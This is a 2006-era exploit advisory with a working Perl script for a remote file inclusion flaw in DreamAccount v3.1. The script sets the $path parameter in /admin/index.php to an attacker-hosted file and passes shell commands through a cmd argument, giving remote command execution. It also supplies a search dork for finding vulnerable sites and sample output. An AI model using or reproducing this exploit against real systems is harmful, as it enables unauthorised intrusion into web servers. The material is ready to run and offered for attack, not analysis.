---------------------------------------------------- DREAMACCOUNT V3.1 Command Execution Exploit ---------------------------------------------------- Discovered By CrAsh_oVeR_rIdE(Arabian Security Team) Coded By Drago84(Exclusive Security Team) ---------------------------------------------------- site of script:http://dreamcost.com ---------------------------------------------------- Vulnerable: DREAMACCOUNT V3.1 ---------------------------------------------------- vulnerable file : ------------------ /admin/index.php ---------------------------------------------------- vulnerable code: ---------------------------------------------------- require($path . "setup.php"); require($path . "functions.php"); require($path . "payment_processing.inc.php"); $path parameter File inclusion ---------------------------------------------------- #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; print "\n=============================================================================\r\n"; print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n"; print "=============================================================================\r\n"; print "[*] dork:\"powered by DreamAccount 3.1\"\n"; print "[*] Coded By : Drago84 \n"; print "[*] Discovered by CrAsH_oVeR_rIdE\n"; print "[*] Use \n"; print " Into the Eval Site it must be:\n\n"; print " Exclusive /Exclusive"; if (@ARGV < 4) { print "\n\n[*] usage: perl dream.pl \n"; print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n"; print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n"; exit(); } my $dir=$ARGV[1]; my $host=$ARGV[0]; my $eval=$ARGV[2]; my $cmd=$ARGV[3]; my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd; print "\n"; my $req=HTTP::Request->new(GET=>$url2); my $ua=LWP::UserAgent->new(); $ua->timeout(10); my $response=$ua->request($req); if ($response->is_success) { print "\n\nResult of:".$cmd."\n"; my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx ); printf $1; $response->content; print "\n"; } ---------------------------------------------------------------------------------------------------- Discovered By CrAsh_oVeR_rIdE Coded By Drago84 E-mail:KARKOR23@hotmail.com Site:www.lezr.com Greetz:KING-HACKER,YOUNG_HACKER ,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR AND ALL LEZR.COM Member